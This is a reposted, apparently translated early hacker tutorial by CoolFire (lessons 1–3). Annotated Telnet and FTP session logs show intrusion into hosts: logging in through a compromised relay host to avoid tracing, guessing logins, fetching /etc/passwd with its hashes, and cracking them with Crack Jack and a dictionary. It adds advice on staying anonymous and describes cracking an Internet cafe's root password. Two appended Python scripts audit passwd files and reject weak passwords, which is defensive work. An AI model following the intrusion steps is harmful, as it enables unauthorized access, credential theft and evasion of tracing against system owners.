Author: CoolFire [firstname.lastname@example.org] (2001-10-12 15:00:00)
CoolHC Volume 1 By CoolFire Author E-Mail: email@example.com
Lin Zhenglong, a famous hacker in Taiwan and a leading figure among Chinese hackers, won the COG Information Security Lifetime Achievement Award in 2011.
Lin Zhenglong, Baidu Encyclopedia
Note: this series collects the eight entry-level hacker articles by CoolFire. The copies found on the Internet are either incomplete or so badly laid out that they are painful to read, so this series has been re-edited for a better reading experience.
This is not a teaching document. It only tells you how systems get cracked so that you can protect your own. If you read this document to the end, you will know how hackers break into your computer. I'm CoolFire. The purpose of this article is to make you understand the importance of computer security, not to teach people to crack passwords. If someone maliciously invades another person's computer or network because of this file, I will not be responsible!!
So what is a hacker? Most books, novels and documents about hackers introduce them the same way: people addicted to computers who destroy things... Alas! Just a pile of strange explanations. Maybe it's better not to be called a Hacker at all.
We only want to understand the technology of the system more deeply: get into it, understand how it works, test its security, then learn to use it, read the operating instructions inside the system and learn its various operations!! A revolution for security!
- Do not maliciously damage any system; this will only bring you trouble. Maliciously damaging other people's software leads to legal punishment; if you only use the computer, it is merely unauthorized use!! Note: do not damage other people's software or data!!
- Do not modify any system files. If you have to modify something after entering the system, change it back to its original state once your purpose is served.
- Do not casually tell friends you don't trust which platform you want to hack.
- Do not discuss anything about your hacking on a BBS.
- Do not use your real name when you post.
- Do not leave your computer while you are inside a system.
- Do not invade or damage hosts of government agencies.
- Do not discuss anything about your hacking on the phone.
- Keep your notes in a safe place.
- If you want to be a Hacker, really hack: read every file about system security and system vulnerabilities!
- Do not delete or modify accounts on a computer you have broken into.
- Do not modify system files. If a modification is needed to hide the intrusion, that is the exception, but the original system's security must still be maintained: do not open a back door just because you control the system!!
- Do not share a cracked account with your friends.
- Enter the host
- Get / etc/passwd
- Get system account
- Get the highest authority
There are several ways to access a host: through Telnet (port 23), SendMail (port 25), FTP, or WWW (port 80). Although a host has only one address, it can provide multiple services at the same time, so if you just want to "get into" the host, these ports are good directions. Of course there are many more ports, but what can you do with the DayTime port??? I don't know. Do you?!
The following demonstration was not as smooth as it looks written down; it is only meant to show you how to get in. Of course there were many problems, such as mistyped commands and so on, which I didn't show in class. For the sake of face, those ugly parts have been deleted.
Demonstrate how to enter the host: (By CoolFire)
(First, connect to a Telnet host on which you already have an account. Of course, it's better if that is a fake host, that is, a host that has already been cracked. Then use it to crack other hosts, so that nobody can trace back to where you are.)
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(I use ms.hinet.net here; of course it's fake, it has been modified!! There's no such host!! Don't be afraid! Don't be afraid! The following host names are all fake. Please remember!!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(Um... we're in! Let's attack! This time the target is...)
ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet... have a try....)
Trying 22.214.171.124...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(never mind, come again!!)
cool login: hinet
Password:
Login incorrect
cool login:
(I didn't guess right. I used the guessing method here. It seems I have bad luck today.)
telnet> close
Connection closed.
(try another Port again!!)
ms.hinet.net> telnet 126.96.36.199 80
Trying 188.8.131.52...
Connected to 184.108.40.206.
Escape character is '^]'.
<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>
Invalid request "" (unknown method)
<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.
(Wow!! It didn't even ask me for a password. Well... try again!! Be persistent!!)
(try FTP Port)
ms.hinet.net> ftp 220.127.116.11
Connected to 18.104.22.168.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (22.214.171.124:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to firstname.lastname@example.org
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(Wow! Anonymous lets you in!! Just type aaa@ in the password part! Don't leave footprints!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(Uh huh... great! We're in! The next goal is...)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (grab it!!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(Oh... is it really this easy?)
ftp> !cat passwd (have a look!!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(Wow... it's shadowed. What a bad start.)
ftp> bye
221 Goodbye.
(I refuse to accept it! As the old saying goes, we must have perseverance.)
(FTP doesn't work. Try Telnet again!!)
ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 126.96.36.199...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(Guessed wrong again!!)
cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 188.8.131.52
Linux 1.2.13.
Some programming languages manage to absorb change but withstand progress.
cool:~$
(Wahaha!! Which idiot root used the system name as both the username and the password? Finally... it wasn't for nothing...)
cool:~$ system
bash: system: command not found
(Um... this user doesn't seem to have much permission.)
cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(I really want to sleep!! No more playing!! Next class...)
Connection closed.
ms.hinet.net> exit
(Gone!! That's it for today! See you next class!! The teacher has to go to work first!!)
(Some students say: cheat! You haven't cracked anything yet!! Nonsense! Didn't we get in??? Look at the title of this lesson -> enter the host!! Mmm...)
In the last lesson I grabbed a useless /etc/passwd. Did you think I was really that stupid? What good can a guest grab? So this lesson continues the last attack. In the last lesson we "guessed" a username and password that is not a guest account. Let's use it to enter the host today!!
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(Um... we're in! Let's attack! This time the target is... ah...)
ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet... have a try.... yesterday's address; take notes!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 184.108.40.206...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password: (same input: fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@
(Looking for the target... it's too messy! I'm too lazy to search. Try again...)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old
cool:/etc$ more passwd
(See whether there is a shadow...)
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(Bingo! There's no defense at all!!)
cool:/etc$ exit
logout
(Gone!... Now let's play with FTP!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(Look! Oh! This one can't be fake!!..)
ftp> bye
221 Goodbye.
ms.hinet.net> exit
(Dismissed!! Class is over!!... Oh, slow down. There's something else to explain...)
Shadowing passwd means the real passwords are kept in the shadow file. The passwd you saw in the first lesson is not the real passwd: because there is nothing in the password field, taking it is useless!! But what did you get in this lesson? Something like the file above. What still needs explaining is what it means???
Each line is divided into fields by ":". Field by field, the john entry reads as follows:
User Name: john
Password: 234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh
Come on! Come on! Keep the passwd you worked so hard to get. In the third lesson we'll talk about how to use Crack Jack to decode passwd. Ha ha... zzZZzZzz...
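The field breakdown above is exactly what an administrator should be auditing on their own machine: an empty password field, or a real hash sitting in world-readable /etc/passwd instead of the shadow file, is what made the two hosts in these lessons easy targets. The following is an added example, not CoolFire's code; it parses the seven-field passwd format and reports those conditions. The sample entries are copied from the listings in lessons 1 and 2; the finding names and the `classify_password_field` rules are my own.

```python
"""Audit an /etc/passwd file for the weaknesses shown in the lessons above.

Added example (not CoolFire's code). Sample lines are entries printed in
lessons 1 and 2; the audit categories and wording are this example's own.
"""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample: entries as printed in the lessons above.
SAMPLE_PASSWD = """\
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
ftp:*:404:1::/home/ftp:/bin/bash
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
"""

HASH_EXPOSED = "password hash exposed in /etc/passwd (not shadowed)"


@dataclass
class PasswdEntry:
    name: str
    password: str   # second field: '', '*', 'x', '!…' or a crypt(3) hash
    uid: int
    gid: int
    gecos: str      # "real name" field
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Split every non-empty, non-comment line on ':' into the seven classic fields."""
    entries: list[PasswdEntry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def classify_password_field(pw: str) -> str:
    """Interpret the second field the way an auditor would.

    ''             -> 'empty'    : no password at all, the account logs in freely
    '*', 'x', '!…' -> 'shadowed' : hash lives in /etc/shadow, or the account is locked
    anything else  -> 'hash'     : a crypt(3) hash sitting in the world-readable file
    """
    if pw == "":
        return "empty"
    if pw in ("*", "x") or pw.startswith("!"):
        return "shadowed"
    return "hash"


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (account, finding) pairs for every entry that needs attention."""
    findings: list[tuple[str, str]] = []
    for e in parse_passwd(text):
        kind = classify_password_field(e.password)
        if kind == "empty":
            findings.append((e.name, "empty password field"))
        elif kind == "hash":
            findings.append((e.name, HASH_EXPOSED))
        if e.uid == 0 and e.name != "root":
            # a second uid-0 account is a classic hidden back door
            findings.append((e.name, "non-root account with uid 0"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{account:10s} {finding}")
```

Run it against a real file with `audit_passwd(open("/etc/passwd").read())`; on a correctly shadowed system every second field is `x` or `*` and the report is empty. The uid-0 check is a generalisation beyond the page: the lessons never show a second root account, but it is the other thing an attacker who has reached this file tends to leave behind.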
Crack Jack V1.4 instructions in Chinese (By CoolFire 12-1-1996)
Um... It's time for lesson 3!! Tired students, go get a drink of water first! In this lesson let's talk about Crack Jack. It is a good tool for decoding /etc/passwd. Don't tell me you're used to Brute: compare the speed of Brute and Crack Jack and you'll immediately throw yourself into the arms of Crack Jack 1.4. But first make sure the one you use is Crack Jack 1.4, which you can get from CoolFire's Hacker & Mailer page! That's the really useful version. Speed... nothing else comes close! But we still have to talk about its shortcomings: it only runs under DOS and OS/2. If you run it in DOS mode on Windoz 95 it won't even pay attention to you!
OK! Now let's get to the point: /etc/passwd! Let's start! Before using Crack Jack 1.4 you need these things:
- Crack Jack 1.4 $%^&@@
- the /etc/passwd file; you can find passwd in the /etc/ directory of a Unix system
- a dictionary file. Oh, ClayMore has a dictionary with more than 1000 words, but it's much smaller than my dictionary, which is also in LetMeIn! 1.0. Listen to James: when we say 2.0 Release, better dictionary files will be included. Look forward to it.
Before using Crack Jack 1.4, you also need to make sure the machine you are using has a 386 or better CPU! Then you'd better have enough memory!!
To start Jack, just type jack. It asks for PW Name: enter your passwd file name; then Dictionary Name: enter your dictionary file name, and Jack starts searching! When it finds one it tells you, and the password it found is written to JACK.POT!! but in a strange format! If it finds a password with root permission, Jack tells you "this is a jackass". Um... swearing!! Because Jack takes so much time, if you want to stop halfway, just press Ctrl-C; don't think all your effort is lost! Jack has a RESTORE function: when interrupted it automatically saves its state as RESTORE. Next time you want to continue the search, just enter Jack -Restore:RESTORE!! Of course you can rename your RESTORE file; Jack will still find it. For example, after "ren restore restore.HNT", just run Jack -Restore:RESTORE.HNT and Jack will automatically restore the last string it was searching and keep looking for you.
Where to find a dictionary file: I won't give you one! You can find one attached to other programs such as Brute Force, or look at other hacker underground sites to see if there is one. You can make one yourself, or take the word list from an English-Chinese dictionary program, whose data files may give you some fields to work from and a basis for writing your own program.
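Everything Crack Jack needs to succeed is visible in the two lessons: a hash in a readable file, and a password that is a dictionary word or, as on the "cool" host, simply the machine's own name. The cheapest defence is to refuse such passwords at the moment they are set, before any hash exists. The following is an added example, not CoolFire's or Crack Jack's code: a password-change check that rejects candidates derived from the username, the host name or a wordlist. The wordlist is a constructed stand-in for the dictionary files the lesson mentions; the `_variants` rules (case folding, reversal, stripping trailing digits or punctuation) go beyond the page, which only describes exact dictionary matches, and are this example's own choice.

```python
"""Reject passwords that a dictionary run like the one described above would
recover quickly. Added example, not CoolFire's or Crack Jack's code.

Intended to run inside a password-change hook, before hashing, so no
crypt(3) hash of a weak password is ever written to passwd or shadow.
"""
from __future__ import annotations

# Constructed mini-dictionary standing in for a real wordlist file.
SAMPLE_WORDLIST = ["password", "secret", "hinet", "linux", "coffee", "john"]


def _variants(password: str) -> set[str]:
    """Forms a simple cracker tries cheaply: case-folded, reversed, and with
    trailing digits or one run of trailing punctuation stripped. This is a
    generalisation of the lesson, which only mentions exact dictionary words."""
    base = password.lower()
    forms = {base, base[::-1]}
    forms.add(base.rstrip("0123456789"))
    forms.add(base.rstrip("!@#$%^&*"))
    return {f for f in forms if f}


def password_problems(password: str, username: str, hostname: str,
                      wordlist: list[str], min_length: int = 8) -> list[str]:
    """Return the reasons a candidate password should be refused (empty list = accept)."""
    if password == "":
        return ["empty"]
    words = {w.lower() for w in wordlist}
    # The host name and each of its labels count as guessable identity words,
    # which is exactly the mistake the "cool" host's root made above.
    identity = {username.lower(), hostname.lower()} | set(hostname.lower().split("."))
    problems: list[str] = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    variants = _variants(password)
    if variants & identity:
        problems.append("derived from the username or host name")
    if variants & words:
        problems.append("found in the dictionary")
    return problems


if __name__ == "__main__":
    host = "cool.hinet.net"   # constructed host name for the demonstration
    for candidate in ["", "cool", "Coffee99", "Tr4vers3-Ridge"]:
        verdict = password_problems(candidate, "john", host, SAMPLE_WORDLIST)
        print(f"{candidate!r:18} -> {'accepted' if not verdict else ', '.join(verdict)}")
```

A real deployment would load the wordlist from a file and pass the system's actual host name; the check costs nothing at password-set time, whereas the lesson's twenty-minute crack on the other side is the price of skipping it.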
[No example in this lesson] Successful case: found the root password of an Internet cafe! Jack is accurate!!! Time taken: about 20 minutes. But some I couldn't find in a day or two... Woo... Hackers! Come on!!